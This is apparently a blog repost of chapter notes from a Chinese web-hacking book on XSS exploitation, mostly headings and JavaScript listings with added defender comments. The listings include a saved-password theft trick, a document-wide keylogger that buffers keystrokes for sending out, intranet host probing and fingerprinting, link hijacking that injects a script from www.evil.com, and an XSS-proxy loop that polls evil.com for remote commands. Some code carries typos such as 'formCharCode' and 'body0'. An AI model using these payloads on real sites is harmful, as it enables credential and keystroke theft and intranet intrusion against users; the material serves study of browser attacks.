web前端黑客技术揭秘 7.漏洞利用

7.1  渗透前的准备

 

7.2  偷取隐私数据

7.2.1  XSS探针:xssprobe

  https://github.com/evilcos/xssprobe/

 

 。。。。。。。。。。。。。

 7.2.2  Referer惹的祸

7.2.3  浏览器记住的明文密码

            // Book demo (section 7.2.3): a bare password <input> is appended to <head>
            // (so it is never rendered) and its value is read back 2 s later, relying on
            // the browser populating the field from its saved-password store.
            // Defender notes: the read only succeeds if the browser autofills a field the
            // user never interacted with; NOTE(review): current browsers generally gate
            // password autofill behind a user gesture or a credential picker — confirm per
            // browser. The code needs a script-injection foothold to run at all, so CSP
            // and output encoding remain the primary control. Assigned to an implicit global.
            get_pwd=function(){
                var e=document.createElement("input");
                // one string assigned to name, type and id: this makes it a password field
                e.name=e.type=e.id="password";
                document.getElementsByTagName("head")[0].appendChild(e);
                // appending to <head> hides it (nothing inside <head> is rendered)
                setTimeout(function(){
                    alert("I can see ur pwd"+document.getElementById("password").value);
                },2000);
            }

        // Second variant of the demo above: the password field is placed inside a
        // <form> together with a text field named "username", presumably because the
        // browser's autofill only matches a username/password pair inside a form —
        // NOTE(review): this is inferred from the listing, confirm per browser.
        // Same caveats as the first variant: requires script injection into the
        // page, and the result is only readable if the browser autofills without a
        // user gesture. Assigned to an implicit global.
        get_pwd = function () {
            var f = document.createElement("form");
            document.getElementsByTagName("head")[0].appendChild(f);
            // appending to <head> hides it (nothing inside <head> is rendered)
            var e1 = document.createElement("input");
            e1.type = "text";
            e1.name = e1.id = "username";
            f.appendChild(e1);
            var e = document.createElement("input");
            // one string assigned to name, type and id: this makes it a password field
            e.name = e.type = e.id = "password";
            f.appendChild(e);
            setTimeout(function () {
                alert("I can see ur pwd:" + document.getElementById("password").value);
            }, 2000);
        }

7.2.4  键盘记录器

 

    // Keylogger demo from the book (section 7.2.4). Both values are script-level state
    // shared by the handlers below.
    var steal = "";// URL the captured keystrokes would be sent to (left empty in the listing)
    var keystirng = "";// accumulated keystroke buffer ("keystirng" is the listing's spelling)
  3 
    // onkeypress handler: maps the pressed key code to a character and appends it to
    // keystirng. The control/navigation codes that keydown() below names explicitly
    // are mapped to "" here so they are not recorded twice.
    // Defender notes: this only runs after script injection into the page (XSS), so
    // CSP and output encoding are the primary control; the exfiltration to `steal`
    // is ordinary outbound HTTP and is where detection is practical.
    function keypress(e) {// handler for onkeypress
        var currKey = 0, CapsLock = 0, e = e || event; // `event` is the legacy IE global
        currKey = e.keyCode || e.which || e.charCode;
        CapsLock = currKey >= 65 && currKey <= 90; // true for the A-Z code range (assigned but never read here)
        switch (currKey) {
            case 8: case 9: case 13: case 32: case 37: case 38: case 39: case 46: keyName = "";

                break;

            default:
                keyName = string.formCharCode(currKey);
                break;
        }
        keystirng += keyName; // keyName is an implicit global shared with keydown()
    }
 19 
    // onkeydown handler: names control and navigation keys as bracketed tokens
    // (e.g. "[CR]", "[TAB]") and appends the token to keystirng; the Enter key is
    // the point where the listing intends to submit the buffer to `steal`.
    // Defender notes: see keypress() above — the outbound request on Enter/blur is
    // the observable side of this code.
    function keydown(e) {// handler for onkeydown
        var e = e || event;
        var currKey = e.keyCode || e.which || e.charCode;
        if ((currKey < 7 && currKey < 14) || (currKey > 31 && currKey < 47)) {
            switch (currKey) {
                case 8:
                    keyName = "[LF]";
                    break;
                case 9:
                    keyName = "[TAB]";
                    break;
                case 13:
                    keyName = "[CR]";
                    break;
                case 32:
                    keyName = "[SPACE]";
                    break;
                case 33:
                    keyName = "[PageUp]";
                    break;
                case 34:
                    keyName = "[PageDown]";
                    break;
                case 35:
                    keyName = "[End]";
                    break;
                case 36:
                    keyName = "[Home]";
                    break;
                case 37:
                    keyName = "[LEFT]";
                    break;
                case 38:
                    keyName = "[UP]";
                    break;
                case 39:
                    keyName = "[RIGHT]";
                    break;
                case 40:
                    keyName = "[DOWN]";
                case 46:
                    keyName = "[DEL]";
                    break;
                default:
                    keyName = "";
                    break;
            }
            if (keyName == "[CR]") { // if it is the Enter key, submit the key log
                // issue the request: steal+keystirng (omitted in the listing)
            }
            keystirng += keyName;
        }
    }
    // onkeyup handler: returns the buffer collected so far (the return value of an
    // event handler is not used by the browser, so this is effectively a no-op).
    function keyup(e) {// handler for onkeyup
        return keystirng;
    }
    // onblur handler: the listing's second exfiltration point, left as a comment.
    function blur() {// handler for onblur (focus left the element)
        // ... sending of the request (steal_url+keystring) omitted
    }
    /**
     * Generic event-binding helper from the book listing.
     *   o  - the DOM object to bind on
     *   e  - event name without the "on" prefix
     *   fn - the NAME of a global function (resolved as window[fn]), not a function value
     * Returns false when any argument is undefined or o is null; otherwise undefined.
     * Side effect: calls o.focus() after binding so that key events start arriving.
     */
    function bindEvent(o, e, fn) {
        var argMissing = typeof o == "undefined" || typeof e == "undefined" || typeof fn == "undefined";
        if (argMissing || o == null) {
            return false;
        }
        var propName = "on" + e;
        if (o.addEventListener) {
            // Standards path; the handler is looked up from the global scope at bind time.
            o.addEventListener(e, window[fn], false);
        } else if (o.attachEvent) {
            // Legacy IE path.
            o.attachEvent(propName, window[fn]);
        } else {
            // Property-handler fallback: chain onto any existing on<e> handler.
            // Note that on this path the global handler is invoked with no arguments.
            var previous = o[propName];
            o[propName] = previous
                ? function (x) { previous(x); window[fn](); }
                : function (x) { window[fn](); };
        }
        o.focus();
    }
    // Wiring: `o` is an implicit global. Handler names are passed as strings because
    // bindEvent() resolves them through window[fn].
    o = document;// target to listen on: the whole document or a single form field
    bindEvent(o, 'keypress', "keypress");
    bindEvent(o, 'keydown', "keydown");
    bindEvent(o, 'keyup', "keyup");
    bindEvent(o, 'blur', "blur");

 7.2.5  偷取黑客隐私的一个小技巧

 

7.3  内网渗透技术

7.3.1  获取内网IP

7.3.2  获取内网IP端口

7.3.3  获取内网主机存活状态

    // Timing-based reachability probe from the book (section 7.3.3): issues a
    // cross-origin GET to `url` and classifies the host by whether the request
    // settles before `timeout` ms. Results are reported via alert(); the argument is
    // a regex literal, which alert() displays as its source text.
    // Defender notes: the probe runs inside a victim's browser, so it reaches hosts
    // the attacker's own machine cannot; NOTE(review): recent browsers restrict
    // requests from public pages to private address space (Private Network Access) —
    // confirm coverage per browser. Segmentation, and monitoring for bursts of
    // browser-originated requests to internal ranges, are the network-side controls.
    function _pingscan(url,timeout){
        
        var d=new Date; // start time for the XMLHttpRequest path
        if(window.xDomainRequest){ // IE8/IE9
            var req=new XDomainRequest();
            req.onerror=fndprocessRequest;// an error callback is taken to mean the host is up
            req.ontimeout=errprocessRequest;// a timeout is taken to mean the host is down
            req.timeout=timeout;// set the timeout value
            function errprocessRequest(){
                alert(/down/);
            }
            function fndprocessRequest(){
                alert(/live/);
            }
        } else if(window.XMLHttpRequest){
            var req=new XMLHttpRequest();
            req.onreadystatechange=processRequest;
            function processRequest(){
                if(req.readyState==4){ // request settled (any status)
                    var d2=new Date;
                    var time=d2.getTime()-d.getTime();
                    if(time<timeout){// completed within the timeout
                        if(time>10){// longer than 10 ms; the book says this check can be ignored
                            alert(/live/);// settled within the timeout -> host considered alive
                        }
                    }else{
                        alert(/down/);// otherwise considered down
                    }
                }
            }
        }else return; // no usable request object in this browser
        req.open("get",url);
        req.send();
    }

7.3.4  开启路由器的远程访问能力

 

7.3.5  内网脆弱的Web应用控制

<script>
    // Suppress script error reporting so a failed load of the probed script does
    // not surface to the user; returning true marks the error as handled.
    window.onerror=function(){
        return true;
    }
    // Probe callback (section 7.3.5): if the loaded script defined the TracWysiwyg
    // function, the intranet host is running Trac's wysiwyg plugin.
    // Defender notes: the detection relies on a cross-site <script> load being
    // allowed from a public page; serving internal static assets with
    // Cross-Origin-Resource-Policy: same-site (or same-origin) and avoiding globals
    // that identify the application reduce this fingerprinting surface.
    function y(){
        if(typeof(TracWysiwyg)=="function") alert("trac exist.");
    }

</script>
<script src="https://192.168.1.2/trac/chrome/tracwysiwyg/wysiwyg.js" onload="y()" onreadystatechange="y()"></script>

7.4  基于CSRF的攻击技术

 

7.5  浏览器劫持技术

<body>
    <!--劫持链接对象-->
    <a href="test1.html">test1.html</a><br/>
    <a href="test2.html">test2.html</a>
    <script>
        // Appends a <script src=src> to the <body> of the given window's document
        // (the book's helper for reaching a window this page opened). `s` is an
        // implicit global.
        function script2obj(window_obj,src){
            s=window_obj.document.createElement("script");
            s.src=src;
            window_obj.document.getElementsByTagName("body")[0].appendChild(s);
        }
        // Link-hijacking demo (section 7.5): replaces every link's onclick so that the
        // target opens in a new window and, 2 s later, the script `js` is injected into
        // that window. It works only because the opened page is same-origin with the
        // page running this code, so its DOM is reachable through the window handle.
        // Defender notes: the root cause is the script-injection foothold on the first
        // page; a CSP script-src that excludes the injected origin blocks the load in
        // the opened page, and the string form of setTimeout used below is evaluated
        // like eval(), which a CSP without 'unsafe-eval' also rejects.
        // `i` and `x` are implicit globals.
        function hijack_links(js){
            /* Hijack link clicks. Parameter:
            js: the script file to inject into the same-origin page opened from the link */
            for (i=0;i<document.links.length;i++) {
                // walk every link object and replace its onclick handler
                document.links[i].onclick=function(){
                    x=window.open(this.href);// keep a handle to the newly opened window
                    setTimeout("script2obj(x,'"+js+"')",2000);
                    // after 2 s inject alert.js into the opened page's DOM tree
                    return false;
                }
            }
        }
        // Demo invocation; the script URL is the book's placeholder host.
        hijack_links("http://www.evil.com/alert.js")
    </script>
</body>

 

7.6  一些跨域操作技术

7.6.1  IE res:协议跨域

7.6.2  CSS String Injection跨域

7.6.3  浏览器特权区域风险

7.6.4  浏览器扩展风险

 

 

7.6.5  跨子域:document.domain技巧

 

7.6.6  更多经典的跨域索引

 

7.7  XSS Proxy技术

        // Loads a script by URL and, when `onload` is given, invokes it once the
        // script has loaded; the readyState branch is the legacy IE variant (the
        // `window.ActiveObject` test is reproduced as printed in the listing).
        // Returns the created element so the caller can remove it later.
        // `o` is an implicit global.
        function inj_script(src,onload){
            o=document.createElement("script");
            o.src=src;
            if(onload){
                if(!window.ActiveObject){
                    o.onload=onload;
                }else{
                    // IE reports load completion through readyState rather than onload
                    o.onreadystatechange=function(){
                        if(o.readyState=="loaded" || o.readyState=="complete"){
                            onload();
                        }
                    }
                }
            }
            document.getElementsByTagName("body0")[0].appendChild(o);
            return o;
        }
        /** Detaches a previously injected element from document.body. */
        function remove_obj(o){
            var host = document.body;
            host.removeChild(o);
        }
        // XSS-proxy polling loop (section 7.7): every 3 s load a fresh "rtcmd" script
        // (the timestamp in `date=` defeats caching) and remove the tag 500 ms later.
        // Defender notes: a fixed-interval request to one host with a changing date=
        // parameter is a distinctive beacon in proxy/HTTP logs, and a CSP script-src
        // limited to known origins stops the load entirely.
        setInterval(function(){
            var rtcmd=inj_script("http://www.evil.com/rtcmd?date="+new Date().getTime());
            setTimeout(function(){
                remove_obj(rtcmd);
            },500);
        },3000);

7.7.3  服务器WebSocket推送请求

        // Echo server used by the book's WebSocket demo (section 7.7.3).
        // NOTE(review): plain ws:// carries frames in cleartext; use wss:// outside a demo.
        var wsUri = "ws://echo.websocket.org/";
        // the ws:// scheme marks this as a WebSocket server address
        var output; // element that receives the log lines; assigned in init()
        /** Page entry point: resolves the log container, then starts the demo connection. */
        function init() {
            var container = document.getElementById("output");
            output = container;
            testWebSocket();
        }
        /**
         * Opens the demo connection and wires the four socket callbacks to the named
         * handlers. `websocket` is assigned without `var` (implicit global) because
         * onMessage() and doSend() reach it by name.
         */
        function testWebSocket() {
            var sock = new WebSocket(wsUri); // open a new connection
            websocket = sock;
            // each wrapper forwards the event object to its handler
            sock.onopen = function (evt) { onOpen(evt); };       // fired once the connection is established
            sock.onclose = function (evt) { onClose(evt); };     // fired when the connection closes
            sock.onmessage = function (evt) { onMessage(evt); }; // fired for every frame from the server
            sock.onerror = function (evt) { onError(evt); };     // fired on a transport error
        }
        /** onopen handler: logs the connection and sends the demo payload. */
        function onOpen(evt){
            var payload = "WebSocket rocks";
            writeToScreen("CONNECTED");
            doSend(payload);
        }
        /** onclose handler: records that the connection has ended. */
        function onClose(evt){
            var note = "DISCONNECTED";
            writeToScreen(note);
        }
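        /**
         * onmessage handler: shows the server's frame in the page, then closes the socket.
         * evt.data is server-controlled and writeToScreen() renders HTML, so the payload
         * is entity-escaped before it is wrapped in the colored <span>.
         * @param {MessageEvent} evt - the incoming frame; evt.data is coerced to a string
         */
        function onMessage(evt){
            var raw = "" + evt.data;
            // minimal entity escaping, sufficient for text placed in element content
            var safe = raw.replace(/[&<>"']/g, function (ch) {
                return { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[ch];
            });
            writeToScreen("<span style='color:blue'>RESPONSE:"+safe+"</span>");
            websocket.close();
        }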
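        /**
         * onerror handler: shows the error in the page.
         * NOTE(review): a WebSocket error event is a plain Event without a `data`
         * property, so this usually prints "ERROR:undefined" — confirm in the target
         * browser. Whatever evt.data holds is entity-escaped because writeToScreen()
         * renders HTML.
         * @param {Event} evt - the error event
         */
        function onError(evt){
            var raw = "" + evt.data;
            // minimal entity escaping, sufficient for text placed in element content
            var safe = raw.replace(/[&<>"']/g, function (ch) {
                return { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[ch];
            });
            writeToScreen("<span style='color:red'>ERROR:"+safe+"</span>");
        }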
        /** Logs an outgoing message, then transmits it on the open socket. */
        function doSend(message){
            var line = "SENT:" + message;
            writeToScreen(line);
            websocket.send(message); // send the message to the server
        }
        /**
         * Appends one <p> holding `message` to the output container.
         * HTML sink: the text is assigned to innerHTML, so callers must escape any
         * untrusted content they embed in it.
         */
        function writeToScreen(message){
            var line = document.createElement("p");
            line.style.wordWrap = "break-word";
            line.innerHTML = message;
            output.appendChild(line);
        }
        // Start the demo once the page has finished loading.
        window.addEventListener("load",init,false);

7.7.4  postMessage方式推送指令

7.8  真实案例剖析

7.8.1  高级钓鱼工具之百度空间登录DIV层钓鱼

7.8.2  高级钓鱼工具之Gmail正常服务钓鱼

7.8.3  人人网跨子域盗取MSN号

7.8.4  跨站获取更高权限

7.8.5  大规模XSS攻击思想

7.9  关于XSS利用框架

原文地址:https://www.cnblogs.com/wingzw/p/7423741.html